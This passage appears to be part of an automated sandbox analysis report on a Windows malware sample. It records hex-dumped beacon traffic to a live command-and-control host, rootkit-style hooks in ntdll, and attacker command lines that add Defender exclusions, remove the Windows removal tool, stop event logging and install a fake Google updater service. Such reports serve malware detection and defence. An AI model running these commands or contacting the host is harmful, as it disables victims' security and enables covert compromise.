                                                                        2024-07-14 21:41:34 UTC1378INData Raw: c2 0f 83 2b fe ff ff 88 44 15 00 48 ff c2 e9 1f fe ff ff 48 8b 16 48 89 e9 e8 14 00 00 00 48 89 e8 48 83 c4 40 5b 5d 5f 5e 41 5e c3 cc cc cc cc cc cc 56 57 53 48 83 ec 20 48 85 d2 74 67 48 89 d6 48 89 cf 0f b6 19 80 3d a8 a0 2b 00 00 0f 84 dc 00 00 00 80 3d 18 b0 2b 00 00 74 3a 66 0f 6f 05 bd 63 00 00 66 0f 6f 0d e5 af 2b 00 66 0f fc c8 66 0f 7f 0d d9 af 2b 00 66 0f fc 05 e1 af 2b 00 66 0f 7f 05 d9 af 2b 00 80 05 e2 af 2b 00 e7 c6 05 dc af 2b 00 00 32 1d b5 af 2b 00 88 1f 48 83 fe 01 75 08 48 83 c4 20 5b 5f 5e c3 44 0f b6 05 be af 2b 00 66 0f 6f 05 95 af 2b 00 66 0f 6f 0d 9d af 2b 00 b8 01 00 00 00 0f b6 0d a1 af 2b 00 48 8d 15 7a af 2b 00 66 0f 6f 15 42 63 00 00 eb 17 41 89 c2 41 83 e2 1f 45 32 0c 12 44 88 0c 07 48 ff c0 48 39 c6 74 ac 44 0f b6 0c 07 45
                                                                        Data Ascii: +DHHHHH@[]_^A^VWSH HtgHH=+=+t:focfo+ff+f+f+++2+HuH [_^D+fo+fo++Hz+foBcAAE2DHH9tDE
                                                                        2024-07-14 21:41:34 UTC1378INData Raw: 00 00 00 48 8d b4 24 b0 00 00 00 ba 00 00 11 c0 49 89 f1 e8 fa dc ff ff 85 c0 78 3b 48 8b 4c 24 60 0f 11 74 24 38 8b 44 24 74 89 44 24 30 48 8b 84 24 c8 00 00 00 48 89 44 24 28 48 89 74 24 20 31 d2 45 31 c0 45 31 c9 e8 d4 dc ff ff 48 8b 4c 24 60 e8 f7 dc ff ff 0f 28 b4 24 f0 04 00 00 0f 28 bc 24 00 05 00 00 44 0f 28 84 24 10 05 00 00 48 81 c4 28 05 00 00 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 c6 05 17 9b 2b 00 01 48 b8 8d 00 70 00 70 00 8d 00 48 89 05 fc 9a 2b 00 66 c7 05 fb 9a 2b 00 31 00 48 8d 0d 24 00 00 00 e8 af db ff ff c6 05 b0 9a 2b 00 01 80 3d e3 9a 2b 00 00 0f 85 1a fe ff ff e9 51 fe ff ff cc cc cc cc cc cc 66 c7 05 c7 9a 2b 00 00 00 48 c7 05 b4 9a 2b 00 00 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc 66 c7 05 b7 9b 2b 00 00 00 48 c7 05 a4 9b 2b
                                                                        Data Ascii: H$Ix;HL$`t$8D$tD$0H$HD$(Ht$ 1E1E1HL$`($($D($H([]_^A\A]A^A_+HppH+f+1H$+=+Qf+H+f+H+
                                                                        2024-07-14 21:41:34 UTC1378INData Raw: 42 0f b7 44 3e 06 49 83 c5 28 39 c5 0f 83 a3 00 00 00 41 8b 45 1c 85 c0 48 89 f9 48 ba df 6b 05 ab af 49 01 7d 48 0f 49 ca 4d 89 e6 4c 0f 49 f3 a9 00 00 00 20 4c 0f 44 f1 48 b8 23 94 fa 54 50 b6 fe 82 49 01 c6 48 8b 4c 24 40 41 8b 55 04 45 8b 4d 08 48 03 54 24 38 45 8b 45 0c 49 01 f0 48 c7 44 24 20 00 00 00 00 e8 d9 d7 ff ff 44 89 f0 83 e0 fe 83 f8 04 74 86 41 8b 45 04 48 03 44 24 38 48 89 44 24 70 41 8b 45 00 48 89 44 24 58 48 8b 4c 24 40 48 8d 44 24 6c 48 89 44 24 20 48 8d 54 24 70 4c 8d 44 24 58 45 89 f1 e8 b3 d8 ff ff e9 49 ff ff ff 48 8d 7c 24 70 41 b8 d0 04 00 00 48 89 f9 31 d2 e8 84 50 00 00 c7 84 24 a0 00 00 00 02 00 10 00 48 8b 4c 24 48 48 89 fa e8 37 d7 ff ff 85 c0 78 70 42 8b 44 3e 28 48 03 44 24 38 48 89 84 24 f0 00 00 00 48 8b 4c 24 48 48 8d
                                                                        Data Ascii: BD>I(9AEHHkI}HIMLI LDH#TPIHL$@AUEMHT$8EEIHD$ DtAEHD$8HD$pAEHD$XHL$@HD$lHD$ HT$pLD$XEIH|$pAH1P$HL$HH7xpBD>(HD$8H$HL$HH


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549735172.67.206.1844437780C:\Windows\System32\dialer.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-07-14 21:41:46 UTC228OUTPOST /api/endpoint.php HTTP/1.1
                                                                        Accept: */*
                                                                        Connection: close
                                                                        Content-Length: 487
                                                                        Content-Type: application/json
                                                                        Host: wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org
                                                                        User-Agent: cpp-httplib/0.12.6
                                                                        2024-07-14 21:41:46 UTC487OUTData Raw: 7b 22 69 64 22 3a 22 63 77 7a 79 68 63 6a 70 67 67 6c 74 62 6d 6a 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 5f 48 45 50 4b 45 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 31 2c
                                                                        Data Ascii: {"id":"cwzyhcjpggltbmjx","computername":"648351","username":"SYSTEM","gpu":"P_HEPKE","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":1,
                                                                        2024-07-14 21:41:46 UTC652INHTTP/1.1 200 OK
                                                                        Date: Sun, 14 Jul 2024 21:41:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSpR%2BBjBEWraTt91roIhSVrZkBfirBfkgiv%2Fn5032ekl5ezQmIoVBxoIJU5JQtOxUkgiro9x6yz3cumSWud%2FudCV2t%2B8k9xD286fCfy3ih1r1jnqTtisEWvJvNTypSID0RQ8ft45dPrtfxlZ6rZftflubSorbgSd15YXutUNzOridkxgP%2FEM1eh1QleKkU1hL9jSdmOhEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8a34adc3b953183d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-07-14 21:41:46 UTC7INData Raw: 32 0d 0a 7b 7d 0d 0a
                                                                        Data Ascii: 2{}
                                                                        2024-07-14 21:41:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549744172.67.206.1844437780C:\Windows\System32\dialer.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-07-14 21:42:44 UTC228OUTPOST /api/endpoint.php HTTP/1.1
                                                                        Accept: */*
                                                                        Connection: close
                                                                        Content-Length: 503
                                                                        Content-Type: application/json
                                                                        Host: wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org
                                                                        User-Agent: cpp-httplib/0.12.6
                                                                        2024-07-14 21:42:44 UTC503OUTData Raw: 7b 22 69 64 22 3a 22 63 77 7a 79 68 63 6a 70 67 67 6c 74 62 6d 6a 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 50 5f 48 45 50 4b 45 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 30 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 52 75 6e 6e 69 6e 67 20 61 73 20 53 79 73 74 65 6d 22 2c 22 72 75 6e 74 69 6d 65 22 3a 36 30
                                                                        Data Ascii: {"id":"cwzyhcjpggltbmjx","computername":"648351","username":"SYSTEM","gpu":"P_HEPKE","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"Running as System","runtime":60
                                                                        2024-07-14 21:42:44 UTC646INHTTP/1.1 200 OK
                                                                        Date: Sun, 14 Jul 2024 21:42:44 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WT8UOs9PSjcybViy9XuMg%2BfgDmTorF3LLosmo4u4oQ1tmaWAY0Vaw3etT9KziJhUHIh2owRn9DlhRLEiSEryRKfvJOCl9WoLHnfNFb6XNNCUjLloaRc32b8QX6MH9upKK90SIgE5MVl9v7gVo%2BSNvOIZDfJuXvXMvX54C5twojvkuU29UB83HkunAONGnJDq9Sdn6sEXWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8a34af30bff61982-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-07-14 21:42:44 UTC7INData Raw: 32 0d 0a 7b 7d 0d 0a
                                                                        Data Ascii: 2{}
                                                                        2024-07-14 21:42:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Code Manipulations

                                                                        User Modules

                                                                        Hook Summary

                                                                        Function NameHook TypeActive in Processes
                                                                        ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                        NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                        ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                        NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                        ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                                        NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                                        NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                        ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                        ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                                        NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                        RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                        NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                        NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                        ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                        ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe

                                                                        Processes

                                                                        Process: winlogon.exe, Module: ntdll.dll
                                                                        Function NameHook TypeNew Data
                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                        Process: explorer.exe, Module: ntdll.dll
                                                                        Function NameHook TypeNew Data
                                                                        ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                        ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:1
                                                                        Start time:17:41:22
                                                                        Start date:14/07/2024
                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe"
                                                                        Imagebase:0x3e0000
                                                                        File size:38'400 bytes
                                                                        MD5 hash:1547E40089B1B06C2E27658C4F478466
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:17:41:36
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\SysWOW64\system64x.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\SysWOW64\system64x.exe"
                                                                        Imagebase:0x7ff762440000
                                                                        File size:2'870'272 bytes
                                                                        MD5 hash:4471F946569BFA17D68108068D7A17A1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 92%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:17:41:36
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:17:41:36
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff6f0230000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff765480000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:18
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                        Imagebase:0x7ff7ec9c0000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:19
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:20
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\wusa.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff724960000
                                                                        File size:345'088 bytes
                                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:21
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                        Imagebase:0x7ff7ec9c0000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:22
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\winlogon.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:winlogon.exe
                                                                        Imagebase:0x7ff6156c0000
                                                                        File size:906'240 bytes
                                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:23
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:24
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                        Imagebase:0x7ff7ec9c0000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:25
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                        Imagebase:0x7ff7ec9c0000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:26
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:27
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:28
                                                                        Start time:17:41:39
